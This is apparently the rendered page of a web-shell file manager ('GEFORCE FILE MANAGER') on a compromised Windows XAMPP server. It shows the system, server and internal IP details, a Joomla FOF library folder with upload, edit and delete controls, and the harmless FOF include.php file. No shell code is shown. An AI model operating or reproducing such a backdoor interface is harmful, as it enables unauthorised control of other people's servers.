[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
backup
/
libraries
/
fof
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 autoloader
SET
[ DEL ]
📁 config
SET
[ DEL ]
📁 controller
SET
[ DEL ]
📁 database
SET
[ DEL ]
📁 dispatcher
SET
[ DEL ]
📁 download
SET
[ DEL ]
📁 encrypt
SET
[ DEL ]
📁 form
SET
[ DEL ]
📁 hal
SET
[ DEL ]
📁 inflector
SET
[ DEL ]
📁 input
SET
[ DEL ]
📁 integration
SET
[ DEL ]
📁 layout
SET
[ DEL ]
📁 less
SET
[ DEL ]
📁 model
SET
[ DEL ]
📁 platform
SET
[ DEL ]
📁 query
SET
[ DEL ]
📁 render
SET
[ DEL ]
📁 string
SET
[ DEL ]
📁 table
SET
[ DEL ]
📁 template
SET
[ DEL ]
📁 toolbar
SET
[ DEL ]
📁 utils
SET
[ DEL ]
📁 view
SET
[ DEL ]
📄 LICENSE.txt
18,417 B
SET
[ EDIT ]
|
[ DEL ]
📄 include.php
770 B
SET
[ EDIT ]
|
[ DEL ]
📄 version.txt
16 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: include.php
<?php /** * @package FrameworkOnFramework * @subpackage include * @copyright Copyright (C) 2010-2015 Nicholas K. Dionysopoulos * @license GNU General Public License version 2, or later * @note This file has been modified by the Joomla! Project and no longer reflects the original work of its author. * * @deprecated 4.0 Deprecated without replacement include FOF by your own if required * * Initializes FOF */ defined('_JEXEC') or die(); if (!defined('FOF_INCLUDED')) { define('FOF_INCLUDED', '2.5.5'); // Register the FOF autoloader require_once __DIR__ . '/autoloader/fof.php'; FOFAutoloaderFof::init(); // Register a debug log if (defined('JDEBUG') && JDEBUG) { FOFPlatform::getInstance()->logAddLogger('fof.log.php'); } }